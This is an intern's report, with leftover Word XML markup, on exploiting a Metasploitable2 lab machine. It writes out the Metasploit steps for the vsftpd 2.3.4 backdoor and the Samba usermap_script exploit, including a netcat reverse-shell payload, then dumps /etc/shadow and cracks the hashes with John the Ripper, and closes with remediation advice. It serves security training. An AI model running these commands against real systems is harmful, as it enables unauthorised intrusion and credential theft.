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Report: System Exploitation &amp; Post-Exploitation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 Name:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Moosa Adnan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 ID:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> APSPL2628099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Program:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cybersecurity &amp; Ethical Hacking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Internship Period:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> February 11, 2026 – April 11,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Organization:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ApexPlanet Software Pvt. Ltd.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Task 5 was to utilize the vulnerability data gathered during the reconnaissance phase (Task 2) to actively exploit the target system (Metasploitable2) and gain unauthorized administrative (root) access. Following successful exploitation, post-exploitation techniques were applied to extract sensitive system data (password hashes). This task demonstrates the critical impact of unpatched services and the power of the Metasploit Framework. All activities were strictly confined to the authorized, isolated virtual lab environment.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Methodology &amp; Tools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was conducted using standard penetration testing frameworks to automate and manage the exploitation process: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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploitable2 (IP: 192.168.56.101)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Attacker System:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux</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Metasploit Framework (msfconsole):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used to select, configure, and execute exploit modules and payloads against the target.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John the Ripper:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used during the post-exploitation phase for offline password hash cracking.</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Phase 1: System Exploitation (vsftpd Backdoor)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Task 2, Nmap identified vsftpd 2.3.4 running on Port 21. This specific version contains a known malicious backdoor that allows an attacker to spawn a root shell by simply appending a smiley face :) to the username during login.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Exploitation Steps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Launched the Metasploit Framework by typing msfconsole in the Kali terminal.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Searched for the relevant exploit module: search vsftpd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Loaded the module: use exploit/unix/ftp/vsftpd_234_backdoor</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Configured the target parameters:</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set RHOSTS 192.168.56.101</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Executed the attack: exploit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Result &amp; Impact</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit successfully triggered the backdoor and opened a command shell session.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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executed the whoami command within the new shell, which returned root.</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Critical. Complete system compromise was achieved in seconds due to a compromised software package.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Phase 2: System Exploitation (Samba usermap_script)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multiple attack vectors, a second exploit was launched against the Samba file-sharing service (Port 139/445), which was identified as vulnerable to a command execution flaw.</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Exploitation Steps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Loaded the Samba exploit module: use exploit/multi/samba/usermap_script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Configured a reverse shell payload to force the target to connect back to the attacker machine:</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set payload cmd/unix/reverse_netcat</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Configured the parameters:</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set RHOSTS 192.168.56.101 (Target IP)</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set LHOST 192.168.56.102 (Kali IP)</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Executed the attack: exploit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Result &amp; Impact</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A reverse shell connection was established.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executed id, which returned uid=0(root) gid=0(root).</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Critical. The attacker bypassed all authentication mechanisms to gain the highest level of system privilege.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Phase 3: Post-Exploitation &amp; Hash Cracking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root access was established, the next objective was to extract data to demonstrate the potential for lateral movement and further compromise.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Extracting Password Hashes</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Using the root shell from the vsftpd exploit, navigated to the /etc directory.</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Dumped the contents of the shadow file: cat /etc/shadow</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Copied the hashed passwords for users such as msfadmin, root, and service and saved them to a local text file on the Kali machine named hashes.txt.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Cracking Hashes with John the Ripper</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Executed John the Ripper against the extracted hashes using a standard wordlist:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt</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The tool successfully cracked multiple passwords, revealing that the msfadmin user was using the password msfadmin, and the postgres user was using postgres.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 &amp; Remediation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compromise of the target system was alarmingly trivial due to the presence of severely outdated, vulnerable services and extremely weak password policies.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Remediations:</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 Updates &amp; Patching:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Immediately upgrade vsftpd and Samba to their latest secure versions. Vulnerability scanning should be a routine practice to catch outdated software.</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Defense in Depth:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement strict firewall rules (iptables) to restrict access to management ports (like FTP and SSH) only to trusted IP ranges.</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Password Policies:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce complex passwords and utilize modern hashing algorithms (like SHA-512 or Argon2) instead of older, easily crackable algorithms.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Declaration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Moosa Adnan, certify that this system exploitation and post-exploitation assessment was performed ethically and solely within the designated, isolated lab environment provided for my internship at ApexPlanet. All actions adhere strictly to the rules of engagement outlined in my offer letter.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